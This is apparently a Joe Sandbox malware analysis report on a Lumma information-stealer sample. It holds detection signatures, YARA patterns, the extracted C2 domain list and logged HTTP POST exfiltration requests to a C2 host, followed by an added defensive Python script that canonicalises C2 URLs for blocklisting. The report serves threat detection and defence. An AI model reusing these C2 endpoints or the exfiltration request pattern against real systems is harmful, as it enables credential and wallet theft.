
Windows Analysis Report
20qMFnd9tO.exe

Overview

General Information

Sample name: 20qMFnd9tO.exe (renamed because the original name is a hash value)
Original sample name: 0f4a71f80cd80f172817f116318e3fca.exe
Analysis ID: 1417393
MD5: 0f4a71f80cd80f172817f116318e3fca
SHA1: cf0d014f19140c6fb86beeeb078cc3cc9fe99a77
SHA256: fe2ad4001c817a77de2e7d4ca694833fef66c99beee799333fc84e74da4cad5e
Tags: 32, exe, trojan

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 20qMFnd9tO.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\20qMFnd9tO.exe" MD5: 0F4A71F80CD80F172817F116318E3FCA)
    • WerFault.exe (PID: 7716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 1556 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Malware configuration (LummaC): {"C2 url": ["pillowbrocccolipe.shop", "communicationgenerwo.shop", "diskretainvigorousiw.shop", "affordcharmcropwo.shop", "dismissalcylinderhostw.shop", "enthusiasimtitleow.shop", "worryfillvolcawoi.shop", "cleartotalfisherwo.shop", "wagonglidemonkywo.shop"], "Build id": "P6Mk0M--key"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.1814752389.00000000007DF000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1498:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: 20qMFnd9tO.exe PID: 7556 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: 20qMFnd9tO.exe PID: 7556 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: 20qMFnd9tO.exe | Avira: detected
Source: https://wagonglidemonkywo.shop:443/api | Avira URL Cloud: Label: malware
Source: https://wagonglidemonkywo.shop/api | Avira URL Cloud: Label: malware
Source: 0.2.20qMFnd9tO.exe.400000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["pillowbrocccolipe.shop", "communicationgenerwo.shop", "diskretainvigorousiw.shop", "affordcharmcropwo.shop", "dismissalcylinderhostw.shop", "enthusiasimtitleow.shop", "worryfillvolcawoi.shop", "cleartotalfisherwo.shop", "wagonglidemonkywo.shop"], "Build id": "P6Mk0M--key"}
Source: https://wagonglidemonkywo.shop:443/api | Virustotal: Detection: 9%
Source: https://wagonglidemonkywo.shop/api | Virustotal: Detection: 9%
Source: 20qMFnd9tO.exe | ReversingLabs: Detection: 38%
Source: 20qMFnd9tO.exe | Virustotal: Detection: 38%
Source: 20qMFnd9tO.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: pillowbrocccolipe.shop
Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: communicationgenerwo.shop
Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: diskretainvigorousiw.shop
Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: affordcharmcropwo.shop
Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: dismissalcylinderhostw.shop
Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: enthusiasimtitleow.shop
Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: worryfillvolcawoi.shop
Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: cleartotalfisherwo.shop
Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: wagonglidemonkywo.shop
Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: P6Mk0M--key
Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Code function: 0_2_004162C7 CryptUnprotectData, 0_2_004162C7

Compliance

Source: C:\Users\user\Desktop\20qMFnd9tO.exe | Unpacked PE file: 0.2.20qMFnd9tO.exe.400000.0.unpack
Source: 20qMFnd9tO.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\20qMFnd9tO.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49737 version: TLS 1.2

Networking

Source: Malware configuration extractor | URLs: pillowbrocccolipe.shop
Source: Malware configuration extractor | URLs: communicationgenerwo.shop
Source: Malware configuration extractor | URLs: diskretainvigorousiw.shop
Source: Malware configuration extractor | URLs: affordcharmcropwo.shop
Source: Malware configuration extractor | URLs: dismissalcylinderhostw.shop
Source: Malware configuration extractor | URLs: enthusiasimtitleow.shop
Source: Malware configuration extractor | URLs: worryfillvolcawoi.shop
Source: Malware configuration extractor | URLs: cleartotalfisherwo.shop
Source: Malware configuration extractor | URLs: wagonglidemonkywo.shop
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: wagonglidemonkywo.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 52 | Host: wagonglidemonkywo.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18161 | Host: wagonglidemonkywo.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8782 | Host: wagonglidemonkywo.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20435 | Host: wagonglidemonkywo.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 7082 | Host: wagonglidemonkywo.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1410 | Host: wagonglidemonkywo.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 593802 | Host: wagonglidemonkywo.shop
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: wagonglidemonkywo.shop
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: wagonglidemonkywo.shop
Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.3.dr | String found in binary or memory: http://upx.sf.net
Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 20qMFnd9tO.exe, 00000000.00000003.1631970037.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.microsof
Source: 20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 20qMFnd9tO.exe, 00000000.00000003.1631970037.0000000002DCC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 20qMFnd9tO.exe, 00000000.00000003.1631970037.0000000002DCC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1647929936.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://wagonglidemonkywo.shop/
Source: 20qMFnd9tO.exe, 00000000.00000003.1647929936.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://wagonglidemonkywo.shop/$
Source: 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://wagonglidemonkywo.shop/8
Source: 20qMFnd9tO.exe, 00000000.00000003.1670761878.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1670659108.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://wagonglidemonkywo.shop/A
Source: 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://wagonglidemonkywo.shop/C
Source: 20qMFnd9tO.exe, 00000000.00000003.1631574292.0000000000858000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wagonglidemonkywo.shop/S
Source: 20qMFnd9tO.exe, 00000000.00000003.1670168050.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1670293622.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://wagonglidemonkywo.shop/a
Source: 20qMFnd9tO.exe, 00000000.00000003.1640623370.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1704602075.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1639887519.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1631574292.0000000000858000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1640514270.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1639851238.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1640312122.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1640246925.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000002.1815288069.0000000002D8F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://wagonglidemonkywo.shop/api
Source: 20qMFnd9tO.exe, 00000000.00000003.1631671750.0000000000839000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1631574292.0000000000837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wagonglidemonkywo.shop/api2
Source: 20qMFnd9tO.exe, 00000000.00000003.1704602075.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000002.1815288069.0000000002D8F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://wagonglidemonkywo.shop/apiH
Source: 20qMFnd9tO.exe, 00000000.00000003.1704602075.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000002.1815288069.0000000002D8F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://wagonglidemonkywo.shop/apiM
Source: 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://wagonglidemonkywo.shop/apiy
            Source: 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/apiyi
            Source: 20qMFnd9tO.exe, 00000000.00000003.1655773543.0000000002D7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/c
            Source: 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/d
            Source: 20qMFnd9tO.exe, 00000000.00000003.1670714016.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1655773543.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1670305521.0000000002D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop/j
            Source: 20qMFnd9tO.exe, 00000000.00000003.1704561901.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wagonglidemonkywo.shop:443/api
            Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: 20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: 20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: 20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: 20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: 20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.221.128:443 -> 192.168.2.4:49737 version: TLS 1.2
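The C2 strings above were recovered from memory dumps, so most of the variants (/$, /8, /A, /apiH, /apiyi and so on) are one genuine URL followed by whatever byte happened to sit after it in memory, not separate endpoints. The form that recurs across the most regions, https://wagonglidemonkywo.shop/api, is also the one that appears with the explicit :443 port in the WinHTTP working memory. The ecosia, google and mozilla URLs are default new-tab and bookmark entries from the browser profiles the sample reads, and 172.67.221.128 falls in Cloudflare's 172.64.0.0/13 range, so the domain rather than the IP is the indicator worth blocking. The script below is an added example, not Joe Sandbox output or tooling: it folds dump noise onto the canonical endpoint and ranks origins by how many memory regions support them. The sample records are constructed from the report's URLs and region counts with shortened region identifiers, and the folding rule is this example's own heuristic.

```python
"""Reduce memory-dump URL strings to canonical C2 indicators.

Added example, not Joe Sandbox code. The input mirrors the report's
"String found in binary or memory" records; SAMPLE_LINES are constructed
from the report's URLs and region counts with shortened region identifiers.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

DETAIL_RE = re.compile(
    r"^Source:\s*(?P<src>.*?)\s*\|?\s*String found in binary or memory:\s*(?P<url>\S+)\s*$"
)


def _report_line(url, regions):
    # Constructed record in the report's shape with `regions` memory-region sources.
    srcs = ", ".join(
        f"20qMFnd9tO.exe, 00000000.00000003.{1600000000 + i}.0000000002D7B000.sdmp"
        for i in range(regions)
    )
    return f"Source: {srcs} | String found in binary or memory: {url}"


SAMPLE_LINES = [
    _report_line("https://wagonglidemonkywo.shop/", 2),
    _report_line("https://wagonglidemonkywo.shop/$", 1),
    _report_line("https://wagonglidemonkywo.shop/8", 1),
    _report_line("https://wagonglidemonkywo.shop/A", 2),
    _report_line("https://wagonglidemonkywo.shop/api", 9),
    _report_line("https://wagonglidemonkywo.shop/api2", 2),
    _report_line("https://wagonglidemonkywo.shop/apiH", 2),
    _report_line("https://wagonglidemonkywo.shop/apiyi", 1),
    _report_line("https://wagonglidemonkywo.shop:443/api", 1),
    _report_line("https://www.ecosia.org/newtab/", 1),
    _report_line("https://www.mozilla.org/en-US/privacy/firefox/Firefox", 1),
    "Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443",
]


def parse_line(line):
    """Return (url, number_of_memory_regions), or None for other record kinds."""
    m = DETAIL_RE.match(line)
    if not m:
        return None
    return m.group("url"), max(m.group("src").count(".sdmp"), 1)


def canonical(url):
    """(scheme://host, path): the scheme's default port and any query string are
    dropped so ':443/api' and '/api' count as the same endpoint."""
    p = urlsplit(url)
    host = p.hostname or ""
    if p.port and p.port != {"https": 443, "http": 80}.get(p.scheme):
        host = f"{host}:{p.port}"
    return f"{p.scheme}://{host}", p.path or "/"


def collapse_paths(support):
    """Fold each path onto its longest prefix in the same path segment whose
    support is at least as high. Trailing bytes left by partially overwritten
    memory ('/api2', '/apiH', '/$') collapse onto the real endpoint; a path that
    differs by a further segment ('/api/v2') is kept as its own endpoint."""
    folded = defaultdict(int)
    for path, n in support.items():
        target = path
        for cut in range(len(path) - 1, 0, -1):
            prefix, rest = path[:cut], path[cut:]
            if "/" in rest:
                break  # crossed a segment boundary: a distinct endpoint, not noise
            if support.get(prefix, 0) >= n:
                target = prefix
                break
        folded[target] += n
    return dict(folded)


def extract_endpoints(lines):
    """Map 'scheme://host' -> {canonical path: number of supporting regions}."""
    raw = defaultdict(lambda: defaultdict(int))
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        url, regions = parsed
        origin, path = canonical(url)
        raw[origin][path] += regions
    return {origin: collapse_paths(paths) for origin, paths in raw.items()}


def rank_hosts(endpoints):
    """Origins ordered by total supporting regions: the C2 dominates, the
    browser-profile URLs (new-tab page, bookmarks) trail with a region each."""
    totals = [(origin, sum(paths.values())) for origin, paths in endpoints.items()]
    return sorted(totals, key=lambda t: (-t[1], t[0]))


if __name__ == "__main__":
    eps = extract_endpoints(SAMPLE_LINES)
    for origin, total in rank_hosts(eps):
        print(total, origin, sorted(eps[origin].items(), key=lambda kv: -kv[1]))
```

Run against the constructed records this yields https://wagonglidemonkywo.shop with /api (15 regions) and / (6 regions) well ahead of the browser-profile hosts. The prefix fold only applies within one path segment, so a second real endpoint such as /api/v2 would survive; a real second endpoint that differs only by trailing characters (/api and /apix) would not, which is the trade-off to keep in mind before feeding the output to a blocklist.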
